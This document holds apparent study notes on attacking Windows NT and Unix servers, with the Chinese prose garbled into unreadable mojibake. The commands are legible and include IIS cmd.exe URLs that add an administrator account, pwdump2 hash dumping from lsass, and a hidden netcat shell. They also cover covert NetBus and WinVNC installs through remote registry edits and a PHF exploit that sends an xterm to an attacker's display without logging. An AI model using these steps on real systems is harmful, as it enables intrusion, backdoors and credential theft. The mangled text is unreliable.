ÁÙ¦b¥Î¤ì°¨µ¥³½¨à¤W¤Ä,µM«á¥Îprot±½ºË,©Î°½¿sicpº|¬},©Î¬O²q±K½X,©Î©ñ©Î±H¯f¬rºô­¶ 
µ¥¤H¥´¶}¨Ó³o¨Çªìµ¥©Î¤¤µ¥ªº§ðÀ»ªk¶Ü??¬ü°êÀb«Èªº¹ê¤O¯u¬O¥t¤HµLªk·Q¹³, 

¥L­Ì¥u»Ý§Q¥Îºô§}´N¯à»´¦Ó·NÁ|ªº¥D°Ê§ðÀ»¤F,±¡µ²¤£¿éµ¹¹q¼v,§Ú­Ìªº¤âªk 

¹ï¥L­Ì¦Ó¨¥¥u¬OµL¶·¤jÅå¤p©Çªº¤p¨à¬ì......°Ñ¦Ò®Ñ¬°¶Â¬õ¦âªººô¸ôÀb«È»P¨t²Î¦w¥þ 

(¦n¹³¦³·sª©ªº,¤p¬Ó¬Oª©ªº,¦WºÙ»P¥~Ãö®t¤£¦h) 

®ÑÄy¤Wªº­«ÂI,§@ªÌ¬O¬ü°êµÛ¦Wªººô¸ô¦w¥þ±M®a, 


»·ºÝ½w½Ä°Ï·¸º¡{buffer overflow} 
½w½Ä°Ï·¸º¡¬Oµo¥Í¦bµ{¦¡¨S¦³¾A·íªºÀˬd¿é¤J¤º®eªºªø«× 
,¦Ó¾É­P½w½Ä°ÏªÅ¶¡¤£¨¬,¦]¦¹,¥ô¦ó¹w´Á¤§¥~ªº¿é¤J,´N·| 
±»»\±¼CPU°õ¦æ°ïÅ|ªº¨ä¥¦³¡¤À. 
»·ºÝ°õ¦æ©R¥O¨ú±o¨t²ÎºÞ²zªÌÅv­­ 
http://www.infowar.co.uk/mnemonix 
»·ºÝ°õ¦æ¤@­Ó§å¦¸ÀÉ°õ¦æ¥ô·Nªºµ{¦¡ 
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm 


ISSHACK http://www.eeye.com 
¦bNT ISSºô­¶¦øªA¾¹¤W°õ¦æµ{¦¡½X 
¦b¥»¾÷¤¤¥i¥Hµ¹¨Ï¤@¦ì¨Ï¥ÎªÌ¥[¤J¨ì°Ï°ìªººÞ²zªÌ¸s²Õ¤¤ªºÂXÅvµ{¦¡ 

http://www.ntsecurity.net/security/getadmin.htm 
¦³¬Û¦ü¥\¯àªº¨ä¥¦µ{¦¡ sechole¤É¯Åª©¬Osecholed 
http://www.ntsecurity.net/security/sechole.htm 
(Domain Admin group) ºô°ìºÞ²zªÌ(¤É¯Å)¸s²Õ 


cmd.exe NT©R¥O¸ÑÄÀ¾¹ 
ntuser µ{¦¡ ¥Î¨Ó­×§ï¨Ï¥ÎªÌ,¸s²Õ©M¬Fµ¦ªºµ{¦¡,¥i°Ñ¦Ò 
http://www.pedestalsoftware.com 

Secholeªº±Ò°Ê¥i¾a¦b¤@­ÓÂsÄý¾¹¿é¤J¤@­Ó¾A·íªºURL³sºô¥Ø¼Ð¨t²Î,¨Ò¦p¤U¦C 

§Ú­Ì±NSechole¤W¶Ç¦Ü/W3SVC/1/ROOT/SCRIPTS 
(³o¸Ì´N¬OC:\inetpub\SCRIPTS) 
µM«á¥Î¤U­±ªºURLºô§}±Ò°Ê¥¦ 
http://192.168.202.154/scripts/secholle.exe 
³o¼Ë°µ·|¦¨¥\ªº±NIUSR_machine_name±b¸¹¥[¤JºÞ²zªÌ¸s²Õ¤¤,§Ú­Ì¨Ã¨S¦³ 

IUSRªº±K½X,¦]¦¹§Ú­Ì¬°¤F­nÁקKµn¤JIUSR,³q±`¬O¦b¥Ø¼Ð¨t²Î¤W¶}­Ó±b¸¹, 

°µªk¬O§Q¥Întuser¤½¥Îµ{¦¡³z¹LÂsÄý¾¹°õ¦æ¤U¦C½ÆÂøªºURL(¬°¤F¤è«K¾\Ū¤º®e¸g¹L¸Ë¹¢) 

http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret 

¥H¤W%20¦Aºô»y¤¤¬OªÅ¥Õªº·N«ä,©Ò¥H¥H¤Wºô§}·|³Q°õ¦æ¬° 
(cmd /c ·|°e¥Xntuser©R¥O¨ìshell,¦b§¹¦¨®É²×µ²¦Û¤v) 
cmd /c ntuser -s <servername> add <username> -password 
<password> 
¥H¤W§Ú­Ì¬O¥Hcorpl°µ¦øªA¾÷¦WºÙ,mallory¬O¨Ï¥ÎªÌ¦WºÙ,secret·í±K½X, 

¥ÎÃþ¦üªºURL§ðÀ»ªÌ¥i¥H¥ÎntuserÀ°§A§âmallory¥[¨ìºÞ²zªÌ¸s²Õ¸Ì,¦p¤U 
(LORGUP¬O«ü¬Y­Ó°Ï°ì¸s²Õ) 
cmd /c ntuser -s <servername> LORGUP APPEND 
<groupname> <username>... 
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory 

¦P¾÷¯àªº§å¦¸Àɼgªk¦pregistry,cmd 
¤º®e: net localgroup administrators <USER> /add 

¦w¥þ¨t²ÎISS¥Ø¿ý©M¤@¨Ç¼ç¦b¥i¦æªº¥Ø¿ý 
http://www.iss.net/xforce/alerts/advise6.html 
¥H¤U/W3SVC/1/ROOT³q±`¬O«üC:\Inetpub\ÁÙ¦³News¤ÎMail 
/W3SVC/1/ROOT/msade 
/W3SVC/1/ROOT/cgi-bin 
/W3SVC/1/ROOT/SCRIPTS 
/W3SVC/1/ROOT/ISSADMPWD 
/W3SVC/1/ROOT/_vti_bin 
/W3SVC/1/ROOT/_vti_bin/_vti_adm 
/W3SVC/1/ROOT/_vti_bin/_vti_aut 
(_vti_bin³£¬O¦w¸ËFront Page¤§«á­l¥Í¥X¨Óªº) 

©ñ§å¦¸Àɪº¦a¤è 
HKLM\software\Microsoft\CurrentVersion 
\RUN [any] 
\AeDebug Debugger 
\WinLogon Userinit 

------------------------------------------------------------ 


°õ¦æNTªºNT Repair Disk Utility (rdisk) 
·|¦b%SYSTEMROOT%\repair 
¤¤²£¥Í¤@­ÓÀ£ÁY¹LªºSAMÀÉ¥sSAM._ ,ÁÙ­ìªk: C:\>expand 
SAM._ SAM 
NTFDOS:NTFSÅX°Ê³nÅéhttp://www.sysinternals.com 

¥i¯}SYSKEYªº¬OPwdump2 
http://www.webspan.net/~tas/pwdump2 
¥¦¥i¨Ï¥ÎDLLª`¤Jªº¤èªk±N¦Û¤vªºµ{¦¡½X´¡¤J¨ä¥¦¨ã¦³§ó°ªÅv­­ªº¦æµ{¤¤, 

¤@¦ýª`¤J§ó°ªÅv­­ªº¦æµ{¤§«á,³o¨Ç´c½èªº°õ¦æ½X´N¥i¥H¦Û¥Ñªº¤º³¡©I¥sAPI, 

¨Ó¦s¨úSYSKEY¥[±Kªº±K½X¦Ó¤£»Ý±N¨ä¸Ñ±K. 
pwdump2©ÒºË·Çªº°ªÅv­­¦æµ{¬Olsass.exe,¥¦¬O°Ï°ì¦w¥þ±ÂÅv¤l¨t²Î, 

Pwd2¬O±N¦Û¤vª`¤J¨ìlsassªº¦ì§}ªÅ¶¡¤¤,¦]¦¹¦b°õ¦æPwdump2¤§«e¥²»Ý°Ê¤â 

§ä¥Xlsass.exeªº¦æµ{Ã丹(PID),¥H¤U¬O¥ÎNTRKùتºpulist¤½¥Îµ{¦¡¨Ã±N 

¿é¥X¾É¦Vfind§ä¥Xlsass.exeªºPID¬°50 
(¥H¤UC:\¥Nªí¥»¾÷,D:\¥Nªí»·ºÝ¥D¾÷) 
D:\>pulist | find "lsass" 
lsass.exe 50 NT AUTHORITY\SYSTEM 
²{¦bPwdump2¥i¥H¨Ï¥ÎPID 50¨Ó°õ¦æ¤F,¹w³]¤U·|±N¥¦ªº¿é¥X 
Åã¥Ü¦b¼ü¼}¤W,¥i¥H«Ü®e·Nªº¾É¦V¤@­ÓÀÉ®× 
D:\>pwdump2 50 

ASCIIµLªkÅã¥Üªº¦r¤¸Num Lock)ALT-255©ÎALT-129 

¥ÎAT°õ¦æ»·ºÝ±Æµ{ (Âù¤Þ¸¹) 
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret"" 

¥h°£¥i¥Î"[job id] /delete" 
»·ºÝ¬d®É¶¡c:>\sc \\192.168.202.44 start schedule 
sc.exe¬O¥i±Ò°Ê±Æµ{ªA°È C:>\net time \\192.168.202.44 


¥H¤UD:\¥Nªí¥»¾÷C:\¥Nªí»·ºÝ 
D:\>remote /c 192.168.202.44 
secret 
C:\>Dir winnt\repair\Sam._ 
C:\>@Q (µ²§ô¥Î¤áºÝ) 
C:>\@k (µ²§ô¦øªAºÝ) 
¦ýremote¤£¥i±Ò°Ê»{¦ó¥Î¨ìWin32 console APIªºµ{¦¡ 

remote.exe /C¬°¥Î¤áºÝ /S¬°¦øªA¼Ò¦¡ 

»·ºÝºÊµø§ì¨ú¿Ã¹õhttp://www.uk.research.att.com/vnc 
----------------------------- 
Netcat 
¥H¤U¬O¨Ï¥Îcommand¨Ó²âÅ¥ 
-L ¤£·|°±¤î 
-d ·t¤¤¶i¦æ,¤£·|¦³¤á°Êªº¥D±±¥x 
-e ¬O«ü©w±Ò°ÊNT©R¥Oªº¸ÑÄÀ¾¹, 
»·ºÝ¬°C:\TEMP\NC11NT 
-p ¬O«ü©w²âÅ¥ªº³q°Tªú 
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080 
¨Ò C:\TEMP\NT11NT>nc 192.168.202.44 8080 
D:\temp\regini -m \\192.168.202.44 netbus.txt 

NTRK¤¤ªºregini.exe¥i¥Hª½±µ§â¥²­nªº¶µ¥Ø¥[¤J¨ì»·ºÝªºRegistry¤º 

REGINIŪ¨ú¤å¦rÀÉ·í°µ¿é¤J¨Ó¶i¦æRegistryªº­×§ï,©Ò¥H§Ú­Ì¥²»Ý«Ø¥ß¤@­Ó 

Netbus.txtªºÀÉ®×¥X¨Ó 
D:\temp\regini -m \\192.168.202.44 netbus.txt 
ªºÀɮפº®e¦p¤U !!!¸Ô²Ó½Ð¨ì®Ñ§½¬d¾\,¤£ª¾¦³¨S¦³§Û¥¿«o!!! 

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus 
Server\Genera 
Accept=1 
TCPPort=80 
Visibility=3 ¦bÁôÂüҦ¡¤U°õ¦æ 
AccessMode=2 
AutoStart=1 ¦bwindows±Ò°Ê®É°õ¦æ 

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus 
Server\Protection 
password=impossible 

WinVNCªº¥Îªk²Ä¤@³¡±N¥²­nÀɽƻs¨ì¥Ø¼Ð¨t²Î(winVNC.exe,VNCHooks.dll,OMNI 
THREAD_RT.DLL) 
2.³]©w¨Ï¥Î¦¹µ{¦¡ªº±K½X,«Ø¤@­Ó¥sWINVNC.INIªºÀɮפº®e¦p¤U 

!!!¸Ô²Ó½Ð¨ì®Ñ§½¬d¾\,¤£ª¾¦³¨S¦³§Û¥¿«o!!! 
HKEY_USER\.DEFAULT\software\ORL\WinVNC3 
SocketConnect=REG_DWORD 
0x00000001 
password=REG_BINARY 0x00000008 

µM«á¨Ï¥Îregini±N³o¨Ç­È¸ü¤J¨ì»·ºÝRegistry¤º 
C:\>regini -m \\192.168.202.33 winvnc.ini 

NTRKªºregdmp¤½¥Îµ{¦¡¬O¥i§âRegistryÂà¿ý¤U¨Ó 

³Ì«á±NwinVNC¦w¸Ë°_¨Ó¦¨¬°¦øªAµ{¦¡¨Ã±Ò°Ê¥¦,¤U¦Cªº»·ºÝ©R¥O,(°O±o³o¬O»·ºÝ©R¥O) 

C:\>WinVNC -install 
C:\>net start winvnc 

²{¦b§Úªù´N¥i¥H±Ò°Êvncviewerµ{¦¡¨Ã©M§Ú­Ìªº¥Ø¼Ð³s½u, 
¤U¹Ï¬O³]©w³s½u¨ì"Åã¥Ü0"IPªº¦ì¸m,¤U¤@¨B¬O±K½X 
___________________________________________ 
| vncSERVER |192.168.202.33.0 |v| 
=========================================== 

«ÝÄò..... 

ºI¨ú­×§ï±K½Xhttp://www.ntsecurity.net/security/passworddll.html 

¤U¨Ò¬O¥iª½±µÅã¥Ü­ì©l½X,Netscape¬O¦sÀÉ 
http://www.Company.com/scripts/files.asp::$DATE 
APSÀÉ«á­±¦h¥[¥yÂI´N¦³¾÷·|¬Ý¨£­ì©lÀÉ,©Î¥H16¶i¦ì¨Ó¯}©j­×¥¿ª© 

http://www.Company.com/code/example.asp. 
http://www.Company.com/code/example%2easp 
-------------------------------------- 

¤@³¡¾÷¾¹ªºSID¬O¤@¦ê¼Æ¦r,¥HS-1¶}ÀY,¨Ã¥H§Z¾î¸¹¤À¦¨¦n´X¬q,¦Ó³Ì«á¤@¯ª 

ªº¼Æ¦rºÙ¬°RID,¹ï©óNT¤º«Øªº¨Ï¥ÎªÌ»P¸s²Õ³£¦³¹w¥ý©w·NªºRID, 

¨Ò¦pAdministratorªºRID½X¤@©w³£¬O500,¦ÓGUEST¬°501,Àb«È¥i¥Îsid2user¨Ó§ä¥X 

¤wª¾SID©MRID¬°500¨Ó§ä¥XºÞ²zªÌªº±b¸¹¦WºÙ(¬J¨Ï§ï¹L¦WºÙ) 
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 
500 (S-1©Mµu¾î¸¹¬O¬Ù²¤ªº) 
http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt 
http://www.ntmag.com/Magazine/Article.cfm?ArtideID=3143 


----------------------------------------- 
³Ì¨Îªºxterm 
UNIX¥i¦b¬Û®eªº¾÷¾¹¤WÅã¥ÜX Window,¤]¯à³z¹Lprot 
-6063Åã¥Ü¦b»·ºÝªº 
X¦øªA¾¹¤W,µM¦Ó¥[¤W-dispaly°Ñ¼Æ§ðÀ»ªÌ¥i¥H±N¥L¦Û¤vªº©R¥O¤¶­±¼h¾É¦V¦Û¤v 

ªºX¦øªA¾¹,¥i¥H§ï¨}­ìPHF§ðÀ»¤è¦¡/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd 

¬JµM§ðÀ»ªÌ¨ã¦³¦bºô­¶¦øªA¾¹¤W°õ¦æ»·ºÝ©R¥Oªº¯à¤O,¥u­n§â³o­Ó§ðÀ»µy·L­×§ï¤@¤U 

,´N¥i¥HÀò¨ú¥æ½Í¦¡¤¶­±¼h¦s¨ú,§ðÀ»ªÌ­n°µªº¬O±N©R¥O¤º®e¤¤ªº/bin/cat 

/etc/passwd §ï¦¨ /usr/X11R6/bin/xterm -ut -dispaly 
evil_hackers_IP:0.0 §¹¾ãªº©R¥O¦p¤U: 
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0 

¤W­±³o­Ó¬O¦b»·ºÝªººô­¶¦øªA¾¹´N·|°õ¦æxterm¨Ã¥BÅã¥Ü¦b§ðÀ»ªÌ(evil_hackers)ªºX¦øªA¾¹¤W 

(µøµ¡ID=0;¿Ã¹õID=0),¦]¬°§Ú­Ì¥[¤W¤F-ut°Ñ¼Æ,¦]¦¹³o­Ó°Ê§@¨Ã¤£·|³Q¨t²Î°O¿ý 

¤U¨Ó,³o¼Ë§ðÀ»ªÌ¸ò¥»¤£»Ý­nµn¤J¥ô¦ó¦øªAµ{¦¡´N¥i¥HÀò±o±Ð½Í¦¡¤¶­±¼h¦s¨ú, 

³q±`§Ú­Ì·|¨Ï¥Îxtermªº§¹¾ã¸ô®|,¦]¬°§Ú­Ì§ðÀ»®i¶}®É,¨äPATHÀô¹Ò°Ñ¼Æ¤£¤@©w³]©w 

²Å¦X§Ú­Ìªº»Ý¨D,¨Ï¥Î§¹¾ã¸ô®|¤~¯à«o«Oºô­¶¦øªA¾¹¥i¥H¶¶§Q§ä¨ìxterm°õ¦æÀÉ 


=================================================== 

port service 
7 echo 
9 discard 
13 daytime 
19 Chargen 
21 ftp 
22 ssh 
23 telnet 
25 smtp 
25 smap 
37 time 
53 dns 
79 finger 
80 http 
110 pop3 
111 sunrpc 
139 netbois 
143 imap 
443 https 
512 exec 
513 login 
514 shell 
2049 nfs 
4045 lockd 
31337 UDP (BO) 
12345 TCP (NetBus) 
1394 DVD 
31337 unassigned 
12345 unassigned 

135-139 UPD©MTCP/IP 

LINUX¥Îºô¸ôµ²ºc±´°É¤u¨ãhttp://www.marko.net/cheops 
¶W¯Å§ì¯¸³nÅéhttp://www.blighty.com/products/spadeªºSam 
SpadeÁÙ¦³Crawl,Website 
¬ªº|Àɮפº®e,¥u­n§ðÀ»ªÌª¾¹DÀɮצì¸m¨Ã¥H«D¼Ð·ÇªºURL°e¥X­n¨D.... 

¸Ôhttp://www.microsoft.com/security/bulletins/ms99-010.asp 


ºô¸ô007 http://www.samspade.org/ 
§@¸­¨t²Î±´ª¾¾¹Queso http://www.apostols.org/projectz/ 
ºô¸ô·½¥Ñµ²ºc¹Ïhttp://www.visualroute.comªºVisualRoute 
ºô¸ôµ²ºc±´¯Á¤u¨ãhttp://www.marko.net/cheops 
http://www.home.cs.utwente.ht/schoenw/scottyªºTkined­ì¥»¬OScotty¨ç¦¡®wªº¤@³¡¥÷ 

Nnmapªº§ó·s¤u¨ãhttp://www.insecure.org:80/cgi-bin/nmap-submit.cgi 

http://www.remotelyanywhere.comºô­¶NTºÞ²z¤u¨ãRemotely 
Anywhere 
2.Remotely Possible / Control IT 
http://www.cai.comªºControl 
IT¥i¦bWindows,Linux,Solaris¤W¥Î 
http://www.uk.research.att.com/Vnc 


queue³B²z¾¹ªº¦î¦C 
dual-homed¨â´Ï¥D¾÷ 
HTML´«¦æ½X%0a 
HTMLªÅ®æ½X%20 
VirtualµêÀÀ 
Privateµ·¤H 
back channel¦^¶Ç³q¹D 
,©w·N:¤@­Ó³q°TºÞ¹D°_©lºÝ¬°¥Ø¼Ð¨t²Î¦Ó«D§ðÀ»ºÝ 
shared library¦@¨É¨ç¦¡®w 
signal«H¸¹ 
aliase¤Æ¦W